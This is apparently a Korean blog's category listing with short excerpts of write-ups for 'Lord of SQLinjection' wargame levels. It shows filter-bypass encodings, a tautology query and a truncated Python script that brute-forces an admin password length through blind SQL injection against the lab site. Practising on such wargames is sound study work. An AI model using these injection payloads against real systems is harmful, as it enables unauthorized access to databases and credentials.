분류 전체보기(150)
-
(los[Lord of SQLinjection]) ORGE
'&' 기호는 GET방식으로 전달되지 않는 다는 특징이 있기 때문에 URL 인코딩 값인 '%26'으로 변환하여 보낸다 우회문자 or -> || and -> && -> %26%26 # -> %23 공격에 성공하지 않았다. 저번 Orc 문제와 동일하게 대문자를 소문자로 바꿔서 했는데도 공격이 성공하질 않았다. 위의 두 번째 문단의 코드를 간과했기 때문이다. 즉, 첫 번째 문단의 코드에서는 id가 guest인 상태에서 pw를 입력 받았으나 두 번째 문단의 코드에서는 id가 admin인 상태에서 pw만 받는 것이였다. 그렇다면, pw만 입력하면 클리어되므로,
2020.04.23 -
(los[Lord of SQLinjection]) DARKELF 2020.04.23
-
(los[Lord of SQLinjection]) WOLFMAN
1. 화이트 스페이스(빈칸) 우회 - Tab : %09 - Lind Feed(\n) : %0a - Carrage Return(\r) : %0d
2020.04.23 -
(los[Lord of SQLinjection]) ORC
import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php? pw=%27 or id=%27admin%27 and length(pw) = " + str(k) + "%23" r = requests.post(url, cookies=(dict(PHPSESSID="2o4ge7l7skce4kl1qhl8kkq404"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " + str(k)) for j in range..
2020.04.23 -
(los[Lord of SQLinjection]) GOBLIN 2020.04.23
-
(los[Lord of SQLinjection]) COBOLT
query : select id from prob_cobolt where id='' or 1=1 ' and pw=md5('')
2020.04.23